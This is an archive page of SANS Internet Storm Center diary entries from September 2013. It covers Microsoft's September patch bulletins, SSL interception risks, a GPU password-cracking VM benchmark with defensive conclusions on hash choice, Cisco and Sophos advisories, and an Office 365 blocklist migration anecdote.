Rsyslogs support very complex logic and syntax. For more information, visit the following links.




Tom Webb



Published: 2013-09-10

Macs need to patch too!

Our regular readers know this, but on Patch Tuesday aka Black Tuesday we get a bit wider audience and hence it's worth repeating it even more:

Do not forget to also patch your Macs!

E.g. a Trojan was recently discoverd that targets Macs with unpatched java flaws. See the Intego writeup.
Not only that, Microsoft Office, Adobe Flash, Shockwave, Reader and/or Acrobat all need to get updated too.

Swa Frantzen


Published: 2013-09-10

More Black Tuesday workload

It's going to be a busy reboot Wednesday it seems:

  • Wireshark 1.8.10 and 1.10.2 have been released today
  • Java 7u40 has been released today
    Thanks Neil for reporting it the first to us.

Swa Frantzen


Published: 2013-09-10

Microsoft September 2013 Black Tuesday Overview

Overview of the September 2013 Microsoft patches and their status.

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*)
clients servers
MS13-067 A multitude of vulnerabilities in sharepoint (Office Server) have been fixed. It could lead to a Denial of Service over privilege escalation  to random code execution with the rights of the W3WP service account.
CVE-2013-1315 is also mentioned in MS13-073.
CVE-2013-3847, CVE-2013-3848, CVE-2013-3849, CVE-2013-3857 and CVE-2013-3858 are also mentioned in MS13-072.
Also contains functional changes for Visio Services.

KB 2834052 CVE-2013-3180 was publicly disclosed. Severity:Critical
NA Critical
MS13-068 A input validation error dealign with S/MIME messages leads to random code execution with the rights of the logged on user. The vulnerability can be triggered by merely viewing or previewing a message.

KB 2756473 No publicly known exploits Severity:Critical
Critical Important
MS13-069 A set of 10 new memory corruption vulnerabilities in this monthly instance of the cumulative MSIE patch. They lead to random code execution withthe rights of the logged on user.

KB 2870699 No publicly known exploits Severity:Critical
Critical Important
MS13-070 A memory handling error in OLE allows for random code execution with the rights of the logged on user.

KB 2876217 No publicly known exploits Severity:Critical
Critical Important

A vulnerability in handling the theme files allows for random code execution with the rights of the logged on user.


KB 2864063 No publicly known exploits Severity:Important
Critical Important
MS13-072 Multiple vulnerabilities allow information leaks and random code execution with the rights of the logged on user.
CVE-2013-3847, CVE-2013-3848, CVE-2013-3849, CVE-2013-3857 and CVE-2013-3858 are also mentioned in MS13-067.

KB 2845537 No publicly known exploits Severity:Important
Critical Important
MS13-073 Multiple vulnerabilities in Excel allow for information leak and random code execution with the rights of the logged on user.
CVE-2013-1315 is also mentioned in MS13-067.

KB 2858300 No publicly known exploits Severity:Important
Critical Important
MS13-074 Multiple vulnerabilities allow random code execution with the rights of the logged on user.

KB 2848637 No publicly known exploits Severity:Important
Critical Important
MS13-075 Pinyn Input Method Editor (IME) for Simplified Chinese allows for a privilege escalation by the user to local system. 
Office IME (Chinese)

KB 2878687 No publicly known exploits Severity:Important
Important Less urgent
MS13-076 Multiple memory corruption vulnerabilities allow privilege escalation. 
Kernel Mode Drivers

KB 2876315 No publicly known exploits Severity:Important
Important Less urgent
MS13-077 A double free vulnerability in the Service Control manager (SCM) allows privilege escalation.
Service Control Manager

KB 2872339 No publicly known exploits Severity:Important
Important Less Urgent

An information leak vulnerability in Frontpage while handling the DTD of an XML file.


KB 2825621 No publicly known exploits Severity:Important
Important Less Urgent
MS13-079 A Denial of Service vulnerability in Active Directory by a query to the LDAP service. Lasts till an administroator restarts the service.
Active Directory

KB 2853587 No publicly known exploits Severity:Important
NA Important
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.

Swa Frantzen


Published: 2013-09-09

SSL is broken. So what?

It is hard to ignore the recent news about government sponsored internet surveillance campaigns, which are alleged to involve decrypting SSL traffic. In light of these news, should you do anything differently? Does it matter to your network and how? Even if today only a small group possesses the knowledge and resources to decrypt SSL, chances are that this secret will leak like so many and the resources required to apply the techniques will only get cheaper and in turn become available to well funded advisories like organized crime. The information once decrypted may also be at risk from being compromised by anyone who compromised the organization that now holds the data. So does it matter? 
First of all, I don't think there is "proof" at this point that SSL in itself has been broken. SSL and the encryption algorithms it negotiates have seen many implementation issues in the past, and it is fair to assume that broken implementations, bad random number generators and sub-optimal configurations make breaking "real live" SSL a lot easier then it should be based on the strength of the underlying algorithms. Additionally, in many high profile attacks, SSL wasn't the problem. The end point or the SSL infrastructure was compromised instead and as a result, the encryption algorithm didn't matter.

Endpoint Security

None of the "APT" style data leaks had much to do with decrypting SSL. Instead, the end point was compromised either by exploiting a technical vulnerability in client software, or by using social engineering techniques to trick the user into installing malicious software. These techniques are old, constantly tweaked and not limited to sophisticated attacks. Each day, we see compromises ranging from the "trivial" fake UPS shipping e-mail over more clever compromised ad networks to highly targeted and well crafted "spear phishing" attacks. 

What is the "Endpoint"?

Many systems promise "end-to-end" encryption. In my opinion, end-to-end encryption means that a message is encrypted by the sender before it is transmitted and decrypted by the *final* recipient. The definition of *final* is critical here. Many encrypted messaging systems will decrypt the message on a server, then re-encrypt it for the recipient. This scheme will expose your message to intercept at the relay point. If you do not control the relay point, then your message is at risk from being intercepted. For example Skype. Skype uses a pretty solid encryption system. But in order to support features like gateways to other phone systems, the respective gateway has to be able to decrypt the message. Whenever your secure messaging system is able to communicate with insecure endpoints, someone else has to be able to decrypt the message. Similar with webmail systems. There are some attempts to built end-to-end encrypted web mail systems that use client side JavaScript or browser plugins to encrypt and decrypt the message. But these systems are not in wide use at this point. Cloud based messaging systems are of course in particular suspect and need to be designed carefully not to allow decryption "in the cloud", which in turn breaks features like search and indexing using cloud resources.

The SSL Infrastructure

There are two ways to "sniff" SSL: On the one hand you can record an SSL encrypted session and decrypt it offline. Without knowledge of the private keys or master keys involved, this process is very difficult if possible at all. The much more commonly used method to intercept SSL is to use a "Man in the Middle" attack. It again concerns the "end-to-end" concept. The attacker terminates the SSL connection and then re-encrypts it for the intended recipient. SSL provides signed certificates to prevent this attack, and clients will warn the user if an invalid certificate is used. The first problem is that the user may ignore the warning, given that too many "real" SSL certificates are not configured properly and produce this warning. Secondly, a browser will consider a certificate as valid if it is signed by a trusted certificate authority. Certificate authorities have been compromised in the past. Many governments control certificate authorities and are able to generate trusted certificates to impersonate other sites. Human factors around certificate authorities and attackers being able to obtain valid certificates are a much larger threat and SSL may have been considered broken for some time as a result. Tools like sslstrip will of course prey on the human interface component to again lead to a more "elegant" man in the middle attack.

So what should I do?

In network security, you always got limited time and limited resources to fight unlimited worries. First, focus on your end points. You are much more likely to suffer from a compromise due to a misconfigured endpoint then a brute-force decrypted SSL session. Secondly, double check the configuration of your SSL clients and servers. Are you using the strongest possible encryption algorithm? Are you using the longest possible keys? This is a tradeoff. For example, not all systems do support anything beyond TLS 1.0. Add respective upgrades to your roadmap. Finally: Encrypt everything. Even a sophisticated adversary has to use some finite resource to decrypt traffic. Increasing the work load by encrypting all traffic, not just "important" traffic is one way to extend the life span of your information. For closed networks that do not have to communicate with the outside world, consider building your own SSL infrastructure (NOT implement your own SSL library). Setup your own CA and only trust certificates signed by your own CA. But in the end, spend your time on problems that matter. It is all too easy to get distracted by the headline of the day.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-09-09

Vulnerability Reported in Sophos Web Appliance

Sophos has reported a combination of vulnerabilties that can be used to perform a remote privilege escalation and gain unauthorised privileged access to the the device.  Details can be found here http://www.sophos.com/en-us/support/knowledgebase/119773.aspx . 

If automatic updating is enabled the fix should be applied without further intervention. 

Mark H


Published: 2013-09-07

Microsoft September Patch Pre-Announcement

Microsoft released its pre-announcement for the upcoming patch Tuesday. The summary indicates 14 bulletins total, 4 are critical all with remote code execution and 10 Important with a mix of remote code execution, Denial of Service and elevation of privileges. The announcement is available here.

[1] http://technet.microsoft.com/en-us/security/bulletin/ms13-sep


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2013-09-06

Would you hire a spammer?

I peruse through my spam folder periodically looking for anything out of the ordinary. I also examine quite closely email that are obviously spam that make it through to my inbox. This one in fact reads a lot like a job application, or a business promotion  attempt gone wrong. Unlike a job application it was not addressed to anyone in particular, and was in fact sent to the SANS Internet Storm Center Handlers distribution list. The fact that the handlers are on a spam list I suppose is not surprising. What I find odd is that this person who is looking for work bought a list for the purpose of spamming it! He did not attach a resume (unlike spammer Bernard Shifman) however did place a link to his LinkedIn profile so that the recipients of his spam can read all about his having achieved his MBA. Which made me wonder if they teach spamming at college or university these days? My thoughts on the subject are that spamming is not the way to go when marketing yourself or your business. Also I am fairly certain SANS would not hire a spammer as a 'business analyst'. The handlers list has never been used to advertise any job openings. Which really has me wondering where he got it? Also where would he get the idea that spamming random people on the Internet would help his job search?

Here is the first part of the correspondence:

He is unapologetic and responds that he is being creative!

I wonder if they teach ethics in business at the place he acquired his MBA? What do you think? Creative or a spammer?
Would you hire or do business with a spammer? He appears to be in good company, has spamming become the new resume distribution method of choice?:

I find it depressing that the spammer appears to have in fact gotten a job roughly four weeks later. Well, according to his LinkedIn profile, so it must be true!

A recommended read on how to actually find a job without sending spam:

What is a 'Bernard Shifman':

Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule


Published: 2013-09-05

Get Ready for PCI 3.0

RIght on schedule (see their lifecycle doc at https://www.pcisecuritystandards.org/pdfs/pci_lifecycle_for_changes_to_dss_and_padss.pdf), the folks at PCI DSS have released a "what to expect" document for PCI 3.0.  I'm a bit late commenting on this - somehow I missed this when it was posted in August.  Specifically called out in the doc are:

  • Lack of education and awareness
  • Weak passwords, authentication
  • Third-party security challenge
  • Slow self-detection, malware
  • Inconsistency in assessments

The change document is here: https://www.pcisecuritystandards.org/documents/DSS_and_PA-DSS_Change_Highlights.pdf

It'll be interesting to see what the final document will look like when it's released in November, and what happens when QSA's turn the PCI guidance into audit findings and recommendations.

Rob VandenBrink


Published: 2013-09-05

What's Next for IPS?

Are you interested in where IPS Systems (Intrusion Prevention Systems) are going over the next few years?  Do you think we'll see more HIPs (Host Intrusion Prevention Systems) feeds into IPS consoles, or more integration with SIEMs?  Or will we just see better versions of what we have today?

Or are you maybe just wondering if your organization needs an IPS?

Either way, we're interested in our input!  We've got a survey running to collect your take on IPS's, and where you expect (or would like) to see them evolve over the next few years:   https://www.surveymonkey.com/s/2013SANSNetworkSecuritySurvey

We'll be collecting the results shortly, and will be sharing them in a SANS Analyst Webcast in October - more details here: https://www.sans.org/webcasts/survey-network-security-96967

Looking forward to your views !

Rob VandenBrink


Published: 2013-09-05

Building Your Own GPU Enabled Private Cloud

With one "extracurricular" project winding up, I figured it was time to start the next one, and playing with the new crop of GPUs for hash and password cracking seems like a fun way to go.

At first glance, using specialized hardware like a GPU would mean that you'd be working in a physical machine, that using a VM is not in the cards.  Not so, it's actually pretty easy to make it fly in a VM, with a bit of planning.  For me, it also means that I don't need to find a spot for a new server.

First of all, you'll need a short list of "must haves":

  • a Hypervisor that supports Vt-d - I'm using VMware ESXi (this is NOT something you want to try in Workstation)
  • A motherboard and CPU that supports Vt-d.  I'm using a Tyan board and a XEON E3 processor.  
  • Be sure that your system board will support PCIe x16 cards.  You don't need x16 throughput, even an x2 slot will do nicely, but it needs to be able to accept an x16 card (my board has an x8 slot)
  • If you plan to use more than one GPU card, be sure the system board has enough slots, and that they are far enough apart (GPUs generally take 2 slots).  Also, with more cards, a tower configuration will tend to overheat the top card(s) - be sure  you have lots of fans in the case, and try to end up with the cards mounted vertically after all is said and done.
  • Be sure you've got a power supply with lots of connectors and power - the card I ended up buying needed both an 8 pin and a 6 pin PCIe power connector.  I've got a 650Watt modular power supply to play with in this machine, so all is well.
  • Finally, the right GPU.

For folks like me that are on a budget, there are two main choices in GPUs - NVIDIA and AMD. 

While both of these cards perform great for graphics, the AMD has and edge in crypto work - it seems to have better integer computing support, so tools like Hashcat or John the Ripper tend to run quicker.
In a virtual environment, the AMD cards seem to work better with Vt-d (called Device Passthrough in the ESXi interface).   If you want to use NVIDIA GPU's, you'll actually install drivers in ESXi, and you'll be confined to the most expensive NVIDIA cards (Quadro 6000, 5000, 4000, or the Tesla or Grid cards).  This is actually pretty cool, as you can spread the GPU's across multiple VM's for Virtual Desktop applications like CAD and the like.  But splitting the power of a GPU card across multiple VM's defeats the whole point of building a VM for cracking.

For my lab, I chose an AMD RADEON 7970 - it's got great processing power and it was on sale that week.  The 7900's seem to be right at the knee of the curve, right where more processing power starts to cost you disproportionally more money.

So, once all the prerequisites are in place, we're ready to go.

1/ First, install your card.  

2/ Next, over to ESXi, we'll need to enable Device Passthrough (Vt-d) for our new device.  You'll find this in Server Settings / Advanced / Edit.  Select the new card (which also selects the PCIe slot that it's in), and save.  You'll need to reboot the server after this done.

3/  Next, over to our VM.  We'll go to the "Edit Settings / Add Hardware" screen, and add this new PCI device.  Once this is done, vMotion and HA will no longer be possible for this VM, since it's tied to a specific PCIe slot in the server.  Even a cold migrate (migration with the VM powered off) will involve some jumping through hoops - removing the card, migrating then re-adding the card after the migrate (you'll of course need identical hardware on the destination server once the migration is complete)

4/ After installing the correct AMD driver in the VM, and we see our card!  I left the card at stock values for everything, nothing was overclocked or outside of the default settings.

5/ Next we'll need to install then the OpenCL SDK in the VM (Downloaded from AMD).

At this point, you'll be able to use the processing power of the GPU in any app written for it - I'm using Hashcat and John the Ripper, they both work great!

Running the hashcat benchmark (oclHashcat-lite64.exe -b) sees the card as a "Tahiti" (the codename for the 7900 series) gives us some really impressive numbers - for instance 8765.0M/s for MD5 (yes, that's in MILLION Hashes per second). While real throughput on the "no-lite" version will be slightly slower, these numbers are all pretty close to truth.

Just for fun, I installed the identical setup on a similar but PHYSICAL machine (3.5 GHz i7 quard core, as poosed to the 3.3 Ghz XEON quad in my ESXi server).  You can see from the table below that the throughput on hash calculations are very close, with the i7 setup a bit slower.  It's in situations like this where you'll see the features in "server class" processors make a difference - things like larger CPU cache for instance.  My ESXi server was running my kid's Minecraft server (with him and all his friends on it), plus we were streaming video off of another VM running DLNA services for our TV, and hashcat in the VM is still is consistently faster than the physical host running a workstation CPU of similar specs.

The numbers for both the physical and virtual and physical servers are shown below.  From this, we can draw a few critical conclusions:

  • Hashing and encryption algorithms have worked well in the past, as CPU power has increased, we've been able to stay ahead of the curve with better encryption (DES followed by 3DES then AES for instance).  While you could always brute-force short strings like passwords, the additional computation involved in each successive algorithm meant that at any point in time, cracking the current algorithm on current hardware would take too long to be practical (unless you had nation-state budgets that is) - essentially this is Moore's Law in action. The power these new GPU cards bring to the table gives the hardware side of the equation a "leapfrog effect" - we're increasing the decryption capability by several orders of magnitude - by lots of zeros!.  And I'm not seeing a fundamental shift on the other side, no new "1,000 or 1,000,000 times harder" algorithm that makes it "difficult enough" to make brute forcing passwords impractical.  Our best defense today is longer passwords - this is an area where size does matter, and bigger is better.  But what's really needed is an alternative to passwords, or a whole other method of storing them.
  • MD5 and SHA1 should no longer be used to store passwords, EVER - with this kind of throughput available to attackers with even minimal budgets, it's just too easy to crack these still commonly used algorithms.  You should be able to draw your own conclusions as to what's a better way to go (look towards the bottom of the list, or look at what's not on the list yet).
  • PBKDF2 (RFC 2898) is not currently on HASHCAT's list of supported algorithms.  This new algorithm isn't widely deployed yet, but it goal is to "eat" a much higher number of compute cycles, making it ideal for password storage (especially if SHA256 is used instead of the default SHA1).  This may be our best bet for password storage, short term (I don't have benchmarks for it yet). We are however, seeing GPU support for this algorithm in John the Ripper.


Hash Type Benchmark Values
  On VM On Physical
 md4($pass.$salt)  16582.8M/s  14963.5M/s
 MD4  15715.4M/s  14578.4M/s
 NTLM  15485.1M/s  14246.9M/s
 MD5   8765.0M/s   8291.2M/s
 md5($pass.$salt)   8725.6M/s   8324.7M/s
 Joomla   8464.9M/s   8349.0M/s
 NetNTLMv1-VANILLA / NetNTLMv1+ESS   7624.8M/s   7034.0M/s
 Cisco-PIX MD5   5895.5M/s   5703.7M/s
 Half MD5   5291.4M/s   5230.3M/s
 DCC, mscash   4438.9M/s   4297.6M/s
 Double MD5   2502.7M/s   2448.9M/s
 vBulletin < v3.8.5   2492.4M/s   2427.9M/s
 SSHA-1(Base64), nsldaps, Netscape LDAP SSHA   2361.5M/s   2314.3M/s
 sha1($pass.$salt)   2359.4M/s   2314.3M/s
 SHA1   2355.9M/s   2314.5M/s
 Oracle 11g   2350.3M/s   2303.0M/s
 MSSQL(2005)   2334.3M/s   2299.4M/s
 MSSQL(2000)   2311.3M/s   2309.7M/s
 SHA-1(Base64), nsldap, Netscape LDAP SHA   2276.0M/s   2295.8M/s
 vBulletin > v3.8.5   1697.7M/s   1628.0M/s
 IPB2+, MyBB1.2+   1693.8M/s   1670.8M/s
 LM   1221.7M/s   1002.0M/s
 MySQL   1141.9M/s   1121.0M/s
 Cisco-IOS SHA256   1114.7M/s 1039.1M/s
 sha256($pass.$salt)   1111.6M/s   1056.1M/s
 SHA256   1109.7M/s   1053.8M/s
 NetNTLMv2    448.0M/s    447.1M/s
 Oracle 7-10g    210.7M/s    181.8M/s
 descrypt, DES(Unix), Traditional DES  47052.0k/s  44934.1k/s
 SHA512  86120.7k/s  85831.9k/s
 sha512($pass.$salt)  86108.5k/s  85799.1k/s
 SHA-3(Keccak)  79302.0k/s  78995.5k/s



Rob VandenBrink


Published: 2013-09-04

Packet captures and log files for Port 14566

A recent uptick in Port 14566 shows some activity over the past month, as shown in our DShield Report(1), however we have little information about what exactly is happening.  Some activity, then a lag near the end of August, followed by a large spike at the end, and the top port the past 24 hours, is curious.  A search of that port using Google and other security and traffic sites has yielded little, so if anybody has log files or activity of this port, we'd love to have a look.


tony d0t carothers --gmail


Published: 2013-09-03

Is "Reputation Backscatter" a Thing?

I recently migrated a client from a 10mbps internet uplink to a new 100mbps uplink with a wireless 10mbps backup.  As part of this, they of course got new IP addresses.

Like the thorough, some would say compulsive person I am, before we migrated I did all the right things:

  • Tested both uplinks to make sure they were working
  • Be sure that I had access to ISP support for both uplinks
  • shortened the DNS TTL to ensure that when we migrated our DNS changes would propogate quickly
  • Checked the IP addresses for SMTP Blocklisting (more on this later).

As expected, the migration went smoothly.  Until the next morning.   My client called me bright and early, with the news  "Our users can't send email to company XYZ".  After some wrangling and some time, I got the NDR (Non Delivery Report).  By then, we had identifed 3 other organizations that would not receive our emails.

The key line in the NDR was:
#< #5.7.1 smtp; 550 5.7.1 Service unavailable; Client host [x.x.x.x] blocked using Blocklist 1; To request removal from this list please forward this message to delist@messaging.microsoft.com> #SMTP#

How could this be?  These IP addresses hadn't been used in at least 6 months!

After a bit of digging (Google really does know all), we found that this is the blocklist service employed by Microsoft Office 365.  This service is unique amongst email blocklist services in that there is no way to check your status online, so me checking in advance with MXTOOLS, Solarwinds EE or any of the other usual tools had not done me a bit of good.

Anyway, we emailed the indicated address with our problem, and asked to be removed from the list.
It soon became apparant that this blocklist service was unique in another important way.  The users of the system of course thought that this email problem was our problem.   From our perspective, the solution to the problem had to be implemented by their mail provider.  The roadblock we had was that, as far as they blocklist was concerned, *they* were the Microosft customer, not us.  So as far as the blocklist admins were concerned, we were nobody.

So, like every other blocklist service under the sun, 6 hours went by, then 12, then 18, and still no word.  We ended up having to open a paid support ticket to get ourselves off a list we never should have been on in the first place.

What did I learn?  That cloud services aren't all sunshine and lolipops?  Umm, no, I already knew that.  That Murphy (as in Murphy's Law) is great at exploiting new features and services?  I thought I knew that too, I just though I had it covered (that'll teach me !! )

The important lesson I learned (aside from the "Murphy lesson") was to add one more check in any migrations that affect email - send a test note to anyone of Office 365.

Have you had similar experiences with email migrations?  Or other gotcha's you though you had 100% covered, but not so much?  Use our comment form to let us know what problems you ran into, and how you resolved them.

Rob VandenBrink


Published: 2013-09-02

Multiple Cisco Security Notice

"Cisco Adaptive Security Appliance (ASA) Software contains a vulnerability that could allow an unauthenticated, remote attacker to fill the connection table in the ASA preventing new connections to be established through the device."[1]
"A vulnerability in the memory management when executing either the show monitor session all or show monitor session command-line interface (CLI) commands on the Cisco Unified Computing System (UCS) 6100 Series Fabric Interconnects could allow an authenticated, local attacker to trigger a memory leak."[2]
"A vulnerability in the Routing Information Protocol (RIP) process of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause the RIP process to crash."[3]
"A vulnerability in Web Administrator Interface of Cisco Wireless LAN Controllers (WLC) could allow an authenticated, remote attacker to cause a denial of service (DoS) condition."[4]

[1] http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3463
[2] http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3467
[3] http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3470
[4] http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3474


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2013-09-02

Snort IDS Sensor with Sguil New ISO Released

The CD includes some new tools and updated scripts. It is available in two versions, 32-bit and 64-bit. The install.pdf document on how to install and configure the system is located in the rel_note directory.

Version 7.3 contains new tools, GUI and database: gulp, nfsen, SQueRT, ssdeep, PassiveDNS with database, Sagan, nfdump, rrdtool, rsyslog and pf_ring.

This page contains additional information, where to download the ISO and the documentation.

[1] http://handlers.dshield.org/gbruneau/shadow.htm


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu